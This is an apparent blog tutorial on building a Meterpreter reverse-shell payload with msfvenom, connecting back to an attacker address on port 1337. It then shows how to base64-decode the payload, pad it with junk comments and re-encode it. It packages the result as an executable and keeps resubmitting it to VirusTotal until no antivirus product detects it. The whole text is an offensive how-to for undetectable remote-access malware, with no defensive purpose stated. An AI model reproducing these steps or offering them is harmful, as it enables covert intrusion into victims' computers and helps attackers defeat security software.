AV companies are in a daily battle with cybercriminals and hackers, these threat actors will try each possible method to get to their goal. In this tutorial, I am going to teach you how it is possible to create a meterpreter VNC shell which will bypass all the antivirus companies that are listed on VirusTotal.com.
To be able to participate in this tutorial, you will have to have installed:
- Kali Linux
Start up your Kali Linux operating system and update it to the latest version by using the commands ‘sudo apt-get update and sudo apt-get upgrade’. Now that you have updated your Kali Linux environment, we are going to create a folder on the desktop titled malware_cwz.
You can do this by performing the following command in your terminal desktop:
Once the directory has been crafted, navigate into it:
Now the fun starts, we are going to craft the malware by using meterpreter:
msfvenom -p python/meterpreter/reverse_tcp LHOST = 192.168.1.100 LPORT= 1337 R> encoded.py
Next we decode the encoded shell:
Open ‘encoded.py’ and copy the value that you can find within the first (‘ till the next ‘).
The values will have to look like random characters.
echo RANDOMVALUE | base64 --decode >> decoded.py
Now that the values have been decoded, we are going to edit the decoded.py file.
type the following in your terminal:
Now we are going to add random text to each line in the file, make sure that the text contains the # value at the start.
lineofcode #randomtext lineofcode #randomtext lineofcode
Now we have to encode it again, do this with the same tool ‘base64’, and copy the encoded string into the same spot of the value of ‘encoded.py’.
Now that encoded.py is fully armed, we can build an executable from it:
The file is then stored in /root/dist/nameofyourfile/.
Upload your file to virustotal.com, and repeat the process untill it is not found by any AV company.